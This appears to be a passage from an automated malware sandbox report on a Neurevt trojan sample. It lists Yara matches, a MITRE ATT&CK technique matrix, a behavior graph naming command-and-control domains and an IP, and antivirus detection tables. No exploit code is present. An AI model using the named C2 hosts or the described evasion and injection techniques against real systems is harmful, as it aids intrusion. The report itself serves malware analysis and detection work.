                      Source: Yara matchFile source: 12.2.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.2b20000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.WerFault.exe.4e0000.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.3330000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.WerFault.exe.4e0000.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.0.WerFault.exe.2860000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.13f0000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.1ef0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.3a60000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.3b60000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.WerFault.exe.4e0000.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.WerFault.exe.4e0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.2b20000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.1ef0000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.3780000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.3b60000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.34f0000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.11b0000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.3490000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.WerFault.exe.4e0000.9.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.3330000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.WerFault.exe.4e0000.14.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000017.00000002.567453491.0000000001648000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000014.00000002.574455217.0000000003B08000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000015.00000000.396214324.0000000001C30000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.343659679.00000000012D8000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000000.380564947.0000000001F18000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.316616817.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000000.384576114.00000000037F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000000.435841188.00000000011D8000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.573127445.0000000002B48000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.304781383.0000000000AE8000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.572338181.0000000003518000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000000.432511210.00000000011B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000000.314654922.0000000003330000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.346386030.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000002.573110629.0000000003818000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000002.573558016.0000000003F98000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000016.00000000.407634102.00000000014D8000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.340678634.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.574221556.0000000003B88000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.329064108.0000000001538000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.321889200.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000000.332881474.00000000034F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.569348461.00000000011D8000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.392904452.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000017.00000000.411551366.0000000001620000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000000.349814520.0000000003490000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000002.571024772.0000000001418000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000002.573251429.0000000003568000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.572526351.0000000003A88000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000000.355904622.0000000003540000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.414915674.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.387584046.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.408213818.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.334422756.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.436527162.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000016.00000000.403064355.00000000014B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.305956078.0000000000B98000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000000.343998812.0000000002B20000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000000.364565540.0000000003F98000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000015.00000000.397968179.0000000001C58000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000000.319722392.0000000003B60000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.365991761.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000014.00000000.392323666.0000000003B08000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.312736811.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000000.304158494.0000000002860000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.303714856.0000000003450000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.375167210.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000000.377927046.0000000001EF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.573518624.00000000037A8000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000000.386887819.0000000003818000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000017.00000000.413386214.0000000001648000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000000.357740409.0000000003568000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000015.00000002.569168238.0000000001C58000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.574122408.00000000034B8000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000000.311100250.0000000003A88000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000000.333990965.0000000003518000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000000.309309441.0000000003A60000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000000.361667048.0000000003F70000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000000.303926607.0000000002860000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.357948198.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000000.337658379.0000000003780000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.571461105.0000000003358000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000000.321390577.0000000003B88000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000000.371629767.00000000013F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000016.00000002.570822035.00000000014D8000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000000.351556895.00000000034B8000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000000.339819447.00000000037A8000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.352061245.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.573636410.0000000001F18000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.398750308.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000014.00000000.390278122.0000000003AE0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000000.346029099.0000000002B48000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000000.373766478.0000000001418000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000000.316211995.0000000003358000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.381234590.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.568998501.0000000002888000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: BbbEtaIxAU.exe PID: 6084, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: WerFault.exe PID: 712, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: zkqrKAufFycYKMdseGdhuYpyTVNu.exe PID: 2904, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: zkqrKAufFycYKMdseGdhuYpyTVNu.exe PID: 4588, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: zkqrKAufFycYKMdseGdhuYpyTVNu.exe PID: 2888, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: zkqrKAufFycYKMdseGdhuYpyTVNu.exe PID: 4596, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: zkqrKAufFycYKMdseGdhuYpyTVNu.exe PID: 2892, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: zkqrKAufFycYKMdseGdhuYpyTVNu.exe PID: 4756, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: zkqrKAufFycYKMdseGdhuYpyTVNu.exe PID: 4700, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: zkqrKAufFycYKMdseGdhuYpyTVNu.exe PID: 3208, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: zkqrKAufFycYKMdseGdhuYpyTVNu.exe PID: 3232, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: zkqrKAufFycYKMdseGdhuYpyTVNu.exe PID: 4964, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: zkqrKAufFycYKMdseGdhuYpyTVNu.exe PID: 2964, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: zkqrKAufFycYKMdseGdhuYpyTVNu.exe PID: 4720, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: zkqrKAufFycYKMdseGdhuYpyTVNu.exe PID: 2872, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: zkqrKAufFycYKMdseGdhuYpyTVNu.exe PID: 4728, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: zkqrKAufFycYKMdseGdhuYpyTVNu.exe PID: 2296, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: zkqrKAufFycYKMdseGdhuYpyTVNu.exe PID: 4648, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: zkqrKAufFycYKMdseGdhuYpyTVNu.exe PID: 4636, type: MEMORYSTR

                      Mitre Att&ck Matrix

                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Valid Accounts13
                      Native API                      		1
                      DLL Side-Loading                      		1
                      DLL Side-Loading                      		11
                      Disable or Modify Tools                      		1
                      OS Credential Dumping                      		1
                      System Time Discovery                      		Remote Services1
                      Archive Collected Data                      		Exfiltration Over Other Network Medium1
                      Ingress Tool Transfer                      		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                      Default Accounts1
                      Shared Modules                      		1
                      Image File Execution Options Injection                      		1
                      Image File Execution Options Injection                      		1
                      Deobfuscate/Decode Files or Information                      		1
                      Input Capture                      		1
                      System Network Connections Discovery                      		Remote Desktop Protocol1
                      Man in the Browser                      		Exfiltration Over Bluetooth1
                      Encrypted Channel                      		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain Accounts1
                      Scheduled Task/Job                      		1
                      Scheduled Task/Job                      		1
                      Access Token Manipulation                      		2
                      Obfuscated Files or Information                      		Security Account Manager1
                      File and Directory Discovery                      		SMB/Windows Admin Shares11
                      Data from Local System                      		Automated Exfiltration2
                      Non-Application Layer Protocol                      		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsAt (Windows)11
                      Registry Run Keys / Startup Folder                      		212
                      Process Injection                      		2
                      Software Packing                      		NTDS112
                      System Information Discovery                      		Distributed Component Object Model1
                      Input Capture                      		Scheduled Transfer112
                      Application Layer Protocol                      		SIM Card SwapCarrier Billing Fraud
                      Cloud AccountsCronNetwork Logon Script1
                      Scheduled Task/Job                      		1
                      DLL Side-Loading                      		LSA Secrets441
                      Security Software Discovery                      		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.common11
                      Registry Run Keys / Startup Folder                      		1
                      Masquerading                      		Cached Domain Credentials13
                      Virtualization/Sandbox Evasion                      		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup Items13
                      Virtualization/Sandbox Evasion                      		DCSync3
                      Process Discovery                      		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
                      Access Token Manipulation                      		Proc Filesystem1
                      Application Window Discovery                      		Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                      Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)212
                      Process Injection                      		/etc/passwd and /etc/shadow1
                      Remote System Discovery                      		Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                      Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)1
                      Hidden Files and Directories                      		Network SniffingProcess DiscoveryTaint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 760719 Sample: BbbEtaIxAU.exe Startdate: 05/12/2022 Architecture: WINDOWS Score: 100 40 issasname.ws 2->40 50 Snort IDS alert for network traffic 2->50 52 Antivirus / Scanner detection for submitted sample 2->52 54 Multi AV Scanner detection for submitted file 2->54 56 5 other signatures 2->56 8 BbbEtaIxAU.exe 4 21 2->8         started        11 yvneslhpc.exe 12 2->11         started        13 yvneslhpc.exe 12 2->13         started        15 yvneslhpc.exe 1 12 2->15         started        signatures3 process4 signatures5 62 Creates an undocumented autostart registry key 8->62 64 Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors) 8->64 66 Uses schtasks.exe or at.exe to add and modify task schedules 8->66 68 4 other signatures 8->68 17 WerFault.exe 7 40 8->17         started        21 schtasks.exe 1 8->21         started        process6 dnsIp7 34 issasname.ws 64.70.19.203, 49690, 49692, 49693 CENTURYLINK-LEGACY-SAVVISUS United States 17->34 36 issasname.pw 17->36 38 192.168.2.1 unknown unknown 17->38 42 Contains functionality to check if Internet connection is working 17->42 44 Overwrites Windows DLL code with PUSH RET codes 17->44 46 Modifies Internet Explorer zone settings 17->46 48 6 other signatures 17->48 23 zkqrKAufFycYKMdseGdhuYpyTVNu.exe 1 12 17->23 injected 26 zkqrKAufFycYKMdseGdhuYpyTVNu.exe 1 12 17->26 injected 28 zkqrKAufFycYKMdseGdhuYpyTVNu.exe 1 12 17->28 injected 32 14 other processes 17->32 30 conhost.exe 21->30         started        signatures8 process9 signatures10 58 Hides threads from debuggers 23->58 60 Hides that the sample has been downloaded from the Internet (zone.identifier) 23->60

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      BbbEtaIxAU.exe90%ReversingLabsWin32.Trojan.Neurevt
                      BbbEtaIxAU.exe93%VirustotalBrowse
                      BbbEtaIxAU.exe100%AviraTR/Crypt.ZPACK.Gen2
                      BbbEtaIxAU.exe100%Joe Sandbox ML

                      Dropped Files

                      No Antivirus matches

                      Unpacked PE Files

                      SourceDetectionScannerLabelLinkDownload
                      4.3.WerFault.exe.4e0000.4.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      16.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.3f70000.5.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      4.3.WerFault.exe.4e0000.11.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      19.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.37f0000.5.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      5.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.3aac67a.3.unpack100%AviraTR/Patched.Ren.GenDownload File
                      19.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.37f0000.2.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      12.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.2b6c67a.6.unpack100%AviraTR/Patched.Ren.GenDownload File
                      4.0.WerFault.exe.28ac67a.3.unpack100%AviraTR/Patched.Ren.GenDownload File
                      4.0.WerFault.exe.28ac67a.1.unpack100%AviraTR/Patched.Ren.GenDownload File
                      12.2.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.2b6c67a.2.unpack100%AviraTR/Patched.Ren.GenDownload File
                      9.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.353c67a.3.unpack100%AviraTR/Patched.Ren.GenDownload File
                      0.2.BbbEtaIxAU.exe.3420000.3.unpack100%AviraTR/Patched.Ren.GenDownload File
                      13.0.yvneslhpc.exe.cd0000.0.unpack100%AviraTR/Crypt.ZPACK.Gen2Download File
                      20.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.3ae0000.2.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      4.2.WerFault.exe.28ac67a.2.unpack100%AviraTR/Patched.Ren.GenDownload File
                      15.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.3540000.5.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      19.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.383c67a.3.unpack100%AviraTR/Patched.Ren.GenDownload File
                      5.2.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.3a60000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      4.3.WerFault.exe.4e0000.16.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      14.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.3490000.5.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      21.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.1c7c67a.6.unpack100%AviraTR/Patched.Ren.GenDownload File
                      14.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.3490000.2.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      22.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.14b0000.2.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      16.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.3f70000.2.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      21.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.1c7c67a.3.unpack100%AviraTR/Patched.Ren.GenDownload File
                      3.0.yvneslhpc.exe.cd0000.0.unpack100%AviraTR/Crypt.ZPACK.Gen2Download File
                      17.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.143c67a.3.unpack100%AviraTR/Patched.Ren.GenDownload File
                      20.2.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.3b2c67a.2.unpack100%AviraTR/Patched.Ren.GenDownload File
                      10.2.yvneslhpc.exe.1510000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      4.2.WerFault.exe.2860000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      14.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.34dc67a.6.unpack100%AviraTR/Patched.Ren.GenDownload File
                      12.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.2b20000.2.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      12.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.2b20000.5.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      12.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.2b6c67a.3.unpack100%AviraTR/Patched.Ren.GenDownload File
                      22.2.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.14b0000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      4.2.WerFault.exe.180000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      16.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.3fbc67a.6.unpack100%AviraTR/Patched.Ren.GenDownload File
                      4.3.WerFault.exe.4e0000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      20.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.3b2c67a.6.unpack100%AviraTR/Patched.Ren.GenDownload File
                      19.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.383c67a.6.unpack100%AviraTR/Patched.Ren.GenDownload File
                      10.0.yvneslhpc.exe.cd0000.0.unpack100%AviraTR/Crypt.ZPACK.Gen2Download File
                      8.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.11b0000.6.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      8.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.11fc67a.7.unpack100%AviraTR/Patched.Ren.GenDownload File
                      15.2.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.3540000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      6.2.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.3330000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      19.2.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.37f0000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      0.2.BbbEtaIxAU.exe.cd0000.2.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      19.2.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.383c67a.2.unpack100%AviraTR/Patched.Ren.GenDownload File
                      11.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.3780000.5.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      11.2.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.3780000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      3.2.yvneslhpc.exe.b70000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      10.2.yvneslhpc.exe.cd0000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      23.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.166c67a.6.unpack100%AviraTR/Patched.Ren.GenDownload File
                      23.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.1620000.5.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      3.2.yvneslhpc.exe.cd0000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      22.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.14fc67a.6.unpack100%AviraTR/Patched.Ren.GenDownload File
                      4.0.WerFault.exe.2860000.2.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      20.2.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.3ae0000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      4.3.WerFault.exe.4e0000.2.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      0.2.BbbEtaIxAU.exe.bd3da0.1.unpack100%AviraTR/Patched.Ren.GenDownload File
                      5.2.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.3aac67a.2.unpack100%AviraTR/Patched.Ren.GenDownload File
                      13.2.yvneslhpc.exe.cd0000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      15.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.3540000.2.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      4.3.WerFault.exe.4e0000.15.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      7.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.3bac67a.6.unpack100%AviraTR/Patched.Ren.GenDownload File
                      0.2.BbbEtaIxAU.exe.ac0000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      7.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.3b60000.5.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      7.0.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.3bac67a.3.unpack100%AviraTR/Patched.Ren.GenDownload File
                      17.2.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.143c67a.2.unpack100%AviraTR/Patched.Ren.GenDownload File
                      4.0.WerFault.exe.2860000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      21.2.zkqrKAufFycYKMdseGdhuYpyTVNu.exe.1c30000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      13.2.yvneslhpc.exe.12b0000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
